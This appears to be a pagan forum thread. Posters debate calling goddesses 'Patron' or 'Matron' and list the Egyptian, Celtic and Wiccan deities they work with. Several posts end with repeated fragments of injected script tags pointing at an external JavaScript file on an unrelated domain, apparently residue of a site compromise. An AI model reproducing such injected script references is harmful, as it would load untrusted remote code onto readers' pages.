Just as a minor linguistic correction here...
The Deities we work with, both male and female are our "Patrons". A " Patron " is " One that supports, protects, or champions someone or something ." This is a gender-neutral term and applies equally to male and female.
A " Matron " on the other hand, is by definition: "
1. A married woman or a widow, especially a mother of dignity, mature age, and established social position.
2. A woman who acts as a supervisor or monitor in a public institution, such as a school, hospital, or prison. I think you'll agree that this definition does not fit the relationship we have with a Goddess.
The fact is that the term "Matron" in reference to one's relationship with a Goddess came out of the feminist movement and has become commonly, but incorrectly, used by many.
That being said, I work with Sekhmet, Anpu, Tejuti, and Menthu.
I've wanted a Patroness from the first moment I discovered alternative religions, but it's like I've only ever really gotten thwapped by macho manly masculine divinities and maybe shapeshifting androgynes.

It feels like it's been ages since I tried looking for my patron gods, but it hasn't even been a year yet! Aset was the first goddess who showed up to me during meditation, so I worked with her the most. Cernunnos came later on to be my patron god, and through him, I've had Him and Aset with me throughout my whole journey. I've devoted myself to other gods as well, so I get myself working a lot to organizing prayers and hymns of praise when I can. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Sorry for the misuse of words, guys! Thank you Lark! And yes, all of my statements were opinions. But thank you guys for answering! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I don't normally give out that information, call it an added layer of mystery. I will say the goddess I am currently working with was mentioned, but not the god. I follow mostly Egyptian, though I've always wanted to study Celtic, so who knows, one day I might encounter a deity from the Celtic path.
I primarily work with the Horned God and Triple Goddess as observed in Wicca. I really don't get the fascination people on this site has with who people worship, I guess its neat, but I would rather discuss offerings, strengthening connections, and experiences people have had with the gods. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
